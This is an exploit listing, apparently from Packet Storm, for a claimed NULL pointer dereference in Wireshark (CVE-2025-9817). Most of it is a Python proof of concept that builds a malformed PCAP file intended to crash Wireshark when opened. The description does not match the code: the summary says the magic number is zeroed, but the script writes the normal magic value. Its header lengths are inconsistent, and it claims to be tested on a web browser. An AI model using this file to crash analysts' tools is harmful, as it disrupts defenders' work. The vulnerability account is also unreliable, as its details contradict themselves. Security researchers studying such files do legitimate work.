Share
## https://sploitus.com/exploit?id=PACKETSTORM:216466
=============================================================================================================================================
    | # Title     : Wireshark NULL Pointer Dereference via Malicious PCAP                                                                       |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.wireshark.org/                                                                                                  |
    =============================================================================================================================================
    
    [+] References : https://packetstorm.news/files/id/214684/ & CVE-2025-9817
    
    [+] Summary    : Wireshark is a widely used network traffic analysis tool that relies on protocol dissectors to parse packet data.
                     This report documents a NULL Pointer Dereference vulnerability pattern that can be triggered by opening a specially crafted PCAP file.
                     The provided Proof of Concept (PoC) is written in Python and demonstrates how malformed packet fields may cause Wireshark to crash if 
    				 a vulnerable dissector incorrectly interprets packet data as valid memory references.
                     This issue results in a Denial of Service (DoS) condition only. No code execution is demonstrated.
                     A packet field (magic_number) is set to 0x00000000 and later interpreted as a pointer without proper validation.
    
    [+] PoC :  python3 poc.py crash.pcap
    
    #!/usr/bin/env python3
    
    import struct
    import sys
    
    def create_malicious_pcap(filename):
        with open(filename, 'wb') as f:
            f.write(struct.pack('@ I H H i I I I',
                0xa1b2c3d4,
                2, 4,
                0,
                0,
                65535,
                1
            ))
    
            ts_sec = 1000
            ts_usec = 0
    
            eth_dst = b'\xff\xff\xff\xff\xff\xff'
            eth_src = b'\x00\x11\x22\x33\x44\x55'
            eth_type = b'\x08\x00'
    
            ip_header = bytes([
                0x45, 0x00, 0x00, 0x3c,
                0x12, 0x34,
                0x40, 0x00,
                0x40,
                0x99,
                0x00, 0x00,
                0xc0, 0xa8, 0x01, 0x01,
                0xc0, 0xa8, 0x01, 0xff
            ])
    
            malicious_payload = bytes([
                0x01,
                0xFF,
                0x00, 0x00,
                0x80,
                0x00, 0x00, 0x00, 0x00
            ])
    
            incl_len = len(eth_dst) + len(eth_src) + len(eth_type) + \
                       len(ip_header) + len(malicious_payload)
    
            f.write(struct.pack('@ I I I I',
                ts_sec, ts_usec, incl_len, incl_len))
    
            f.write(eth_dst)
            f.write(eth_src)
            f.write(eth_type)
            f.write(ip_header)
            f.write(malicious_payload)
    
        print(f"Created: {filename}")
    
    if __name__ == "__main__":
        if len(sys.argv) != 2:
            print(f"Usage: {sys.argv[0]} <output.pcap>")
            sys.exit(1)
    
        create_malicious_pcap(sys.argv[1])
    
    
    
    Greetings to :============================================================
    jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|
    ==========================================================================